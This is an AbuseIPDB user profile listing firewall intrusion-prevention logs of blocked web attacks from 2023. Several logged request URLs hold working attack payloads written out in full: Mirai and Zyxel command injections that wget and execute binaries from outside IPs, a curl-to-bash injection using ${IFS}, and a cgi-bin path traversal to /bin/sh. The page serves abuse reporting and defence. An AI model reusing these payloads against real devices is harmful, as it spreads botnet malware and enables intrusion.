Matei Baniceru - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User Matei Baniceru joined AbuseIPDB in May 2023 and has reported 36 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇷🇴 92.118.39.245	30 Aug 2023	date=2023-08-26 time=02:24:09 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16930058493155603 ... show more date=2023-08-26 time=02:24:09 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693005849315560308 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=92.118.39.245 srccountry="Romania" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28439649 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=60368 dstport=80 hostname="136.255.207.206" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://136.255.207.206:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5502267 msg="applications3: Multiple.Routers.GPON.formLogin.Remote.Command. show less	Web App Attack
🇻🇳 115.78.10.124	30 Aug 2023	date=2023-08-26 time=11:53:47 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16930400273607684 ... show more date=2023-08-26 time=11:53:47 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693040027360768488 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=115.78.10.124 srccountry="Vietnam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28566415 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=33000 dstport=80 hostname="81.196.84.26" url="/api" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5503929 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇨🇳 103.59.112.92	30 Aug 2023	date=2023-08-26 time=21:07:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16930732790223128 ... show more date=2023-08-26 time=21:07:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693073279022312816 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=103.59.112.92 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28707588 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Mirai.Botnet" srcport=41690 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" agent="Hello, world" httpmethod="GET" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=5505183 msg="backdoor: Mirai.Botnet" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇨🇳 101.74.200.170	30 Aug 2023	date=2023-08-27 time=08:19:13 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931135530258058 ... show more date=2023-08-27 time=08:19:13 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693113553025805811 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=101.74.200.170 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28851293 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Mirai.Botnet" srcport=53934 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws" agent="Hello, world" httpmethod="GET" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=5506475 msg="backdoor: Mirai.Botnet" crscore=30 craction=8192 crlevel="high show less	Web App Attack
🇩🇪 176.97.210.61	30 Aug 2023	date=2023-08-27 time=09:01:50 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931161109300524 ... show more date=2023-08-27 time=09:01:50 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693116110930052456 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=176.97.210.61 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28860360 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=52536 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5506585 msg="applications3: Multiple.Routers.GPON.formLogin.Remote.C show less	Web App Attack
🇳🇱 94.156.6.167	30 Aug 2023	date=2023-08-27 time=09:07:43 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931164632117431 ... show more date=2023-08-27 time=09:07:43 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693116463211743199 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=94.156.6.167 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28861572 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="AndroxGh0st.Malware" srcport=55635 dstport=80 hostname="api.gn.directpharma.ro" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5506592 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇫🇷 213.5.130.61	30 Aug 2023	date=2023-08-27 time=12:25:57 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931283573748433 ... show more date=2023-08-27 time=12:25:57 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693128357374843339 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=213.5.130.61 srccountry="France" dstip=192.168.10.12 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28904437 action="dropped" proto=6 service="HTTP" policyid=79 poluuid="77aa622c-b8d9-51ed-64c5-d67d0270f5a9" policytype="policy" attack="HTTP.Unix.Shell.IFS.Remote.Code.Execution" srcport=48634 dstport=80 hostname="81.196.84.26" url="/online&kill-id=1;sudo$%7BIFS%7Dcurl$%7BIFS%7Dhttp://45.95.147.183/b.sh$%7BIFS%7D%7C$%7BIFS%7Dbash;" agent="python-requests/2.25.1" httpmethod="GET" direction="outgoing" attackid=45677 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45677" incidentserialno=5507154 msg="misc: HTTP.Unix.Shell.IFS.Remote.Code.Execution" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇩🇪 81.161.229.149	30 Aug 2023	date=2023-08-27 time=12:58:17 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931302977652192 ... show more date=2023-08-27 time=12:58:17 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693130297765219275 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=81.161.229.149 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28911817 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=63620 dstport=80 hostname="81.196.84.26" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5507206 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇷🇺 83.97.73.87	30 Aug 2023	date=2023-08-30 time=13:07:19 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933900394376840 ... show more date=2023-08-30 time=13:07:19 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693390039437684001 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=83.97.73.87 srccountry="Russian Federation" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30830000 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Generic.XXE.Detection" srcport=53122 dstport=80 hostname="81.196.84.26" url="/Autodiscover/Autodiscover.xml" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=32416 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID32416" incidentserialno=5816284 msg="applications3: Generic.XXE.Detection" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇺🇸 85.239.240.253	30 Aug 2023	date=2023-08-27 time=14:26:52 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931356128546007 ... show more date=2023-08-27 time=14:26:52 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693135612854600753 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=85.239.240.253 srccountry="United States" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28931883 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="AndroxGh0st.Malware" srcport=58809 dstport=80 hostname="136.255.207.206" url="/" agent="Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5507443 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇭🇰 219.79.89.33	30 Aug 2023	date=2023-08-27 time=14:38:20 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931363004857227 ... show more date=2023-08-27 time=14:38:20 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693136300485722777 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=219.79.89.33 srccountry="Hong Kong" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28934906 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=51972 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.97.210.211/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5507456 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096 show less	Web App Attack
🇩🇪 193.35.18.177	30 Aug 2023	date=2023-08-27 time=18:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931506927322765 ... show more date=2023-08-27 time=18:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693150692732276577 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=193.35.18.177 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=28990216 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="PHPUnit.Eval-stdin.PHP.Remote.Code.Execution" srcport=42536 dstport=80 hostname="81.196.84.26" url="/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" agent="Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=45765 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45765" incidentserialno=5507959 msg="web_server: PHPUnit.Eval-stdin.PHP.Remote.Code.Execution" crscor show less	Web App Attack
🇧🇪 45.156.128.12	30 Aug 2023	date=2023-08-28 time=00:45:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16931727597782854 ... show more date=2023-08-28 time=00:45:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693172759778285480 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=45.156.128.12 srccountry="Portugal" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29071821 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="MS.Windows.HTTP.sys.Request.Handling.Remote.Code.Execution" srcport=43058 dstport=80 hostname="136.255.207.206" url="/" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=40402 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID40402" incidentserialno=5508710 msg="web_server: MS.Windows.HTTP.sys.Request.Handling.Remote.Code.Execution" crscore=50 craction=4096 show less	Web App Attack
🇬🇧 157.231.51.20	30 Aug 2023	date=2023-08-28 time=13:10:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16932174591662172 ... show more date=2023-08-28 time=13:10:59 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693217459166217251 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=157.231.51.20 srccountry="United Kingdom" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29437804 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=36061 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5581036 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096 show less	Web App Attack
🇨🇳 111.42.95.131	30 Aug 2023	date=2023-08-28 time=19:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16932406925861779 ... show more date=2023-08-28 time=19:38:12 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693240692586177946 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=111.42.95.131 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="wan1" srcintfrole="wan" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=29677469 action="dropped" proto=6 service="HTTP" policyid=52 poluuid="311b0104-42de-51eb-1ced-6dc3cf1a3df5" policytype="policy" attack="Apache.HTTP.Server.cgi-bin.Path.Traversal" srcport=60824 dstport=80 hostname="136.255.207.206" url="/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" agent="Custom-AsyncHttpClient" httpmethod="POST" direction="outgoing" attackid=50825 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID50825" incidentserialno=5637412 msg="apache: Apache.HTTP.Server.cgi-bin.Path.Traversal" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇨🇳 14.122.168.114	30 Aug 2023	date=2023-08-29 time=11:19:44 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16932971847286751 ... show more date=2023-08-29 time=11:19:44 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693297184728675152 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=14.122.168.114 srccountry="China" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30037482 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Zivif.PR115-204-P-RS.Web.Cameras.Credentials.Disclosure" srcport=22800 dstport=80 hostname="81.196.84.26" url="/web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr" agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" httpmethod="GET" direction="outgoing" attackid=45492 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID45492" incidentserialno=5680118 msg="applications: Zivif.PR115-204-P-RS.Web.Cameras.Credentials.Disclosure" crscore=50 show less	Web App Attack
🇮🇳 198.23.251.118	30 Aug 2023	date=2023-08-29 time=12:02:45 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16932997658646614 ... show more date=2023-08-29 time=12:02:45 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693299765864661481 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=198.23.251.118 srccountry="United States" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30071125 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Atlassian.Confluence.CVE-2021-26084.Remote.Code.Execution" srcport=44104 dstport=80 hostname="81.196.84.26" url="/pages/createpage-entervariables.action" agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=50727 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID50727" incidentserialno=5688539 show less	Web App Attack
🇷🇺 83.97.73.87	30 Aug 2023	date=2023-08-29 time=12:23:34 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933010149105234 ... show more date=2023-08-29 time=12:23:34 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693301014910523476 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="medium" srcip=83.97.73.87 srccountry="Russian Federation" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30087433 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Apache.Solr.SolrResourceLoader.Directory.Traversal" srcport=54008 dstport=80 hostname="81.196.84.26" url="/solr/admin/info/system?wt=json" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=37677 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID37677" incidentserialno=5692502 msg="apache: Apache.Solr.SolrResourceLoader.Directory.Traversal" show less	Web App Attack
🇻🇳 14.225.252.51	30 Aug 2023	date=2023-08-29 time=13:18:55 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933043358276208 ... show more date=2023-08-29 time=13:18:55 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693304335827620827 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=14.225.252.51 srccountry="Vietnam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30128330 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Dasan.GPON.Remote.Code.Execution" srcport=53664 dstport=80 url="/GponForm/diag_Form?images/" agent="Hello, World" httpmethod="POST" direction="outgoing" attackid=46083 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID46083" incidentserialno=5699587 msg="applications3: Dasan.GPON.Remote.Code.Execution" crscore=50 craction=4096 crlevel="critical" show less	Web App Attack
🇮🇳 43.158.213.246	30 Aug 2023	date=2023-08-29 time=13:46:16 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933059765750983 ... show more date=2023-08-29 time=13:46:16 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693305976575098371 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=43.158.213.246 srccountry="India" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30150983 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Backdoor.Cobalt.Strike.Beacon" srcport=34996 dstport=80 hostname="81.196.84.26" url="/jquery-3.3.1.min.js" agent="'Mozilla/5.0" httpmethod="GET" referralurl="http://code.jquery.com/" direction="outgoing" attackid=39078 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID39078" incidentserialno=5703264 msg="backdoor: Backdoor.Cobalt.Strike.Beacon" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇳🇱 141.98.6.77	30 Aug 2023	date=2023-08-29 time=15:14:02 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933112426411919 ... show more date=2023-08-29 time=15:14:02 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693311242641191928 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=141.98.6.77 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30229566 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="AndroxGh0st.Malware" srcport=56642 dstport=80 hostname="81.196.84.26" url="/" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" httpmethod="POST" direction="outgoing" attackid=52567 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52567" incidentserialno=5718470 msg="misc: AndroxGh0st.Malware" crscore=30 craction=8192 crlevel="high" show less	Web App Attack
🇳🇱 84.54.51.146	30 Aug 2023	date=2023-08-29 time=15:34:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933124589570660 ... show more date=2023-08-29 time=15:34:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693312458957066028 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=84.54.51.146 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30247363 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=46622 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5722681 msg="applications3: Multiple.Routers.GPON.formLogin.Remote show less	Web App Attack
🇧🇪 45.156.128.7	30 Aug 2023	date=2023-08-29 time=18:22:07 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933225272091686 ... show more date=2023-08-29 time=18:22:07 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693322527209168682 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=45.156.128.7 srccountry="Portugal" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30333313 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Telerik.Web.UI.RadAsyncUpload.Handling.Arbitrary.File.Upload" srcport=57766 dstport=80 hostname="81.196.84.26" url="/Telerik.Web.UI.WebResource.axd?type=rau" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" httpmethod="GET" direction="outgoing" attackid=48789 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID48789" incidentserialno=5735552 msg="applications3: Telerik.Web.UI.RadAsyncUpload show less	Web App Attack
🇬🇺 202.128.92.209	30 Aug 2023	date=2023-08-29 time=18:37:36 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933234568364041 ... show more date=2023-08-29 time=18:37:36 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693323456836404196 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="critical" srcip=202.128.92.209 srccountry="Guam" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30338066 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Zyxel.zhttpd.Webserver.Command.Injection" srcport=52158 dstport=443 url="/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://176.97.210.211/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" httpmethod="GET" direction="outgoing" attackid=53200 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID53200" incidentserialno=5735741 msg="applications3: Zyxel.zhttpd.Webserver.Command.Injection" crscore=50 craction=4096 crlevel="critic show less	Web App Attack
